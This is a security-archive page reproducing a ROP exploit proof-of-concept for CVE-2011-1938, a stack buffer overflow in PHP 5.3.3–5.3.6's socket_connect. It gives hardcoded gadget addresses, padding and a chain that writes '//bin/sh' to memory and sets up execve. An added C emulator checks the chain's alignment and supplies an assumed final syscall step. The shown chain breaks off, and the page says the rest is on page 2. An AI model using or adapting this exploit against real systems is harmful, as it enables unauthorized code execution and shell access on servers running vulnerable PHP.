PHP 5.3.6 buffer overflow POC (ROP) - CVE vulnerability warning - Black Bar Safety Net (myhack58)

2011-07-28T00:00:00
ID MYHACK58:62201131367
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-07-28T00:00:00

Description

<?php
/*
** xiaolandjj@qq.com
** http://bbs.xxoxo.org
** 15 July 2011
** Stack-based buffer overflow in the ext/sockets/sockets.c socket_connect function
** in PHP 5.3.3 through 5.3.6 allows context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
** By: 小蓝 (xiaolan)
*/

echo "[+] PHP 5.3.6 buffer overflow POC(ROP)\n";
echo "[+] CVE-2011-1938\n\n";

#!/usr/bin/php

// Every constant is a 4-byte little-endian word as it will sit on the stack:
// gadget addresses inside the non-PIE php binary (0x08xxxxxx) and a writable
// scratch address (0x0874ba20) where "//bin/sh\0" is assembled word by word.
define("DUMMY",     "\x42\x42\x42\x42"); // filler consumed by pops we do not care about
define("STACK",     "\x20\xba\x74\x08"); // data 0x46a0 0x874ba20: writable scratch address
define("STACK4",    "\x24\xba\x74\x08"); // STACK+4
define("STACK8",    "\x28\xba\x74\x08"); // STACK+8
define("STACK12",   "\x3c\xba\x74\x08"); // labelled STACK+12 in the post; 0x0874ba3c is actually STACK+0x1c (unused below)
define("INT_80",    "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define("INC_EAX",   "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define("XOR_EAX",   "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define("MOV_A_D",   "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret          (write-what-where)
define("POP_EBP",   "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define("MOV_B_A",   "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define("MOV_DI_DX", "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define("POP_EDI",   "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define("POP_EBX",   "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define("XOR_ECX",   "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);            // distance from the start of sun_path to the saved return address

// Each gadget's pop-epilogue eats the following stack words, so every pop
// gets its own slot (DUMMY where the value does not matter).
$payload = POP_EDI.    // pop %edi
           STACK.      // 0x874ba20
           DUMMY.      // pop %ebp
           MOV_DI_DX.  // mov %edi,%edx        -> edx = STACK
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           "//bi".     // pop %ebp             -> ebp = "//bi"
           MOV_B_A.    // mov %ebp,%eax        -> eax = "//bi"
           DUMMY.      // pop %ebx
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           DUMMY.      // pop %ebp
           MOV_A_D.    // mov %eax,(%edx)      -> [STACK] = "//bi"
           POP_EDI.    // pop %edi
           STACK4.     // 0x874ba24
           DUMMY.      // pop %ebp
           MOV_DI_DX.  // mov %edi,%edx        -> edx = STACK+4
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           "n/sh".     // pop %ebp             -> ebp = "n/sh"
           MOV_B_A.    // mov %ebp,%eax        -> eax = "n/sh"
           DUMMY.      // pop %ebx
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           DUMMY.      // pop %ebp
           MOV_A_D.    // mov %eax,(%edx)      -> [STACK+4] = "n/sh"
           POP_EDI.    // pop %edi
           STACK8.     // 0x874ba28
           DUMMY.      // pop %ebp
           MOV_DI_DX.  // mov %edi,%edx        -> edx = STACK+8
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           DUMMY.      // pop %ebp
           XOR_EAX.    // xor %eax,%eax
           MOV_A_D.    // mov %eax,(%edx)      -> [STACK+8] = 0, NUL terminator of "//bin/sh"
           XOR_ECX.    // xor %ecx,%ecx        -> ecx = 0 (also zeroes eax via mov %ecx,%eax)
           DUMMY.      // pop %ebx
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           DUMMY.      // pop %ebp
           POP_EBX.    // pop %ebx
           STACK.      // 0x874ba20            -> ebx = address of "//bin/sh"
           DUMMY.      // pop %esi
           DUMMY.      // pop %edi
           // (the chain continues on page 2 of the original post, not reproduced here)
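The fragile part of a chain like the one above is slot counting: every gadget ends in a run of pops, and one missing or extra filler word sends a data word into %eip instead of the next gadget. The following C program is an added example, not the post's code: it emulates the side effects of the post's gadgets (using the post's addresses only as labels), replays the chain exactly as laid out on this page, and checks that it leaves memory and registers in the state execve("//bin/sh", NULL, envp) needs. The tail after the visible chain (the last pop %ebp, eax = 11 via XOR_EAX and eleven INC_EAX, then INT_80) is my assumption about how the post's page 2 finishes; the 64-byte scratch region at STACK is likewise a modelling assumption.

```c
/* rop_check.c: offline emulation of the gadget semantics used in the PoC above.
 * Added example, not the original post's code. Only gadget side effects are
 * modelled; nothing here runs PHP or real machine code. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STACK      0x0874ba20u   /* writable scratch address from the post */
#define SCRATCH_SZ 64u           /* bytes of that region we model (assumption) */
#define STR4(a,b,c,d) ((uint32_t)(uint8_t)(a) | ((uint32_t)(uint8_t)(b) << 8) | \
                       ((uint32_t)(uint8_t)(c) << 16) | ((uint32_t)(uint8_t)(d) << 24))

enum {                           /* gadget addresses as listed in the post */
    DUMMY     = 0x42424242,      /* filler for a pop whose value is irrelevant */
    INT_80    = 0x0807b627,      /* int $0x80 */
    INC_EAX   = 0x080f5066,      /* inc %eax ; ret */
    XOR_EAX   = 0x0809b460,      /* xor %eax,%eax ; ret */
    MOV_A_D   = 0x08123e84,      /* mov %eax,(%edx) ; ret */
    POP_EBP   = 0x080648c7,      /* pop %ebp ; ret */
    MOV_B_A   = 0x08064518,      /* mov %ebp,%eax ; pop ebx,esi,edi,ebp ; ret */
    MOV_DI_DX = 0x08072620,      /* mov %edi,%edx ; pop esi,edi,ebp ; ret */
    POP_EDI   = 0x08072623,      /* pop %edi ; pop %ebp ; ret */
    POP_EBX   = 0x08214d0f,      /* pop ebx,esi,edi,ebp ; ret */
    XOR_ECX   = 0x081f3be3,      /* xor %ecx,%ecx ; pop %ebx ; mov %ecx,%eax ; pop esi,edi,ebp ; ret */
};

typedef struct {
    uint32_t eax, ebx, ecx, edx, esi, edi, ebp;
    uint8_t  mem[SCRATCH_SZ];    /* models [STACK, STACK + SCRATCH_SZ) */
    int      syscall_hit;
} cpu_t;

/* Pop the next chain word into *dst; fails if the chain runs out. */
static int pop(const uint32_t *chain, size_t n, size_t *pc, uint32_t *dst) {
    if (*pc >= n) return -1;
    *dst = chain[(*pc)++];
    return 0;
}

/* Little-endian 32-bit store into the modelled scratch region. */
static int store32(cpu_t *c, uint32_t addr, uint32_t v) {
    if (addr < STACK || addr + 4 > STACK + SCRATCH_SZ) return -1;
    uint32_t off = addr - STACK;
    for (int i = 0; i < 4; i++) c->mem[off + i] = (uint8_t)(v >> (8 * i));
    return 0;
}

/* Walk the chain applying each gadget's semantics. Returns 1 when int $0x80 is
 * reached, 0 if the chain ends first, -1 when a filler/data word lands where a
 * return address should be (a miscounted pop slot), -2 on an out-of-model write. */
int run_chain(cpu_t *c, const uint32_t *chain, size_t n) {
    size_t pc = 0;
    uint32_t w;
    while (pop(chain, n, &pc, &w) == 0) {
#define POP(reg) if (pop(chain, n, &pc, &c->reg)) return 0
        switch (w) {
        case POP_EDI:   POP(edi); POP(ebp); break;
        case POP_EBP:   POP(ebp); break;
        case POP_EBX:   POP(ebx); POP(esi); POP(edi); POP(ebp); break;
        case MOV_DI_DX: c->edx = c->edi; POP(esi); POP(edi); POP(ebp); break;
        case MOV_B_A:   c->eax = c->ebp; POP(ebx); POP(esi); POP(edi); POP(ebp); break;
        case MOV_A_D:   if (store32(c, c->edx, c->eax)) return -2; break;
        case XOR_EAX:   c->eax = 0; break;
        case XOR_ECX:   c->ecx = 0; POP(ebx); c->eax = c->ecx; POP(esi); POP(edi); POP(ebp); break;
        case INC_EAX:   c->eax++; break;
        case INT_80:    c->syscall_hit = 1; return 1;
        default:        return -1;
        }
#undef POP
    }
    return 0;
}

/* The post's chain as laid out on this page, followed by the assumed finish. */
static const uint32_t poc_chain[] = {
    POP_EDI, STACK, DUMMY,
    MOV_DI_DX, DUMMY, DUMMY, STR4('/', '/', 'b', 'i'),
    MOV_B_A, DUMMY, DUMMY, DUMMY, DUMMY,
    MOV_A_D,                                  /* [STACK]   = "//bi" */
    POP_EDI, STACK + 4, DUMMY,
    MOV_DI_DX, DUMMY, DUMMY, STR4('n', '/', 's', 'h'),
    MOV_B_A, DUMMY, DUMMY, DUMMY, DUMMY,
    MOV_A_D,                                  /* [STACK+4] = "n/sh" */
    POP_EDI, STACK + 8, DUMMY,
    MOV_DI_DX, DUMMY, DUMMY, DUMMY,
    XOR_EAX, MOV_A_D,                         /* [STACK+8] = 0: terminator, and an empty envp */
    XOR_ECX, DUMMY, DUMMY, DUMMY, DUMMY,      /* ecx = 0: argv = NULL */
    POP_EBX, STACK, DUMMY, DUMMY,             /* ebx -> "//bin/sh"; page 1 of the post ends here */
    /* assumed continuation (page 2 is not reproduced above): */
    DUMMY,                                    /* last pop %ebp of POP_EBX */
    XOR_EAX, INC_EAX, INC_EAX, INC_EAX, INC_EAX, INC_EAX, INC_EAX,
    INC_EAX, INC_EAX, INC_EAX, INC_EAX, INC_EAX,  /* eax = 11 = __NR_execve on i386 */
    INT_80,
};

/* 1 when the chain reaches int $0x80 with execve("//bin/sh", NULL, envp) set up. */
int chain_yields_execve(const uint32_t *chain, size_t n) {
    cpu_t c;
    memset(&c, 0, sizeof c);
    if (run_chain(&c, chain, n) != 1) return 0;
    return c.eax == 11 && c.ebx == STACK && c.ecx == 0 && c.edx == STACK + 8
        && memcmp(c.mem, "//bin/sh\0", 9) == 0;
}

int verify_poc_chain(void) {
    return chain_yields_execve(poc_chain, sizeof poc_chain / sizeof poc_chain[0]);
}

/* Drop the first filler after MOV_DI_DX: its epilogue then swallows the next
 * gadget address and the emulator "returns" into a DUMMY word (-1). */
int verify_misaligned_chain_fails(void) {
    size_t n = sizeof poc_chain / sizeof poc_chain[0];
    uint32_t bad[128];
    memcpy(bad, poc_chain, 4 * sizeof(uint32_t));
    memcpy(bad + 4, poc_chain + 5, (n - 5) * sizeof(uint32_t));
    cpu_t c;
    memset(&c, 0, sizeof c);
    return run_chain(&c, bad, n - 1) == -1;
}

int main(void) {
    printf("poc chain ok: %d, misaligned chain rejected: %d\n",
           verify_poc_chain(), verify_misaligned_chain_fails());
    return 0;
}
```

Running it prints both checks as 1. The emulator is deliberately strict: any word that is not one of the listed gadgets is treated as a bad return address, which is exactly how you catch an off-by-one filler before testing against the real php binary.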

[continued on page 2 of the original post]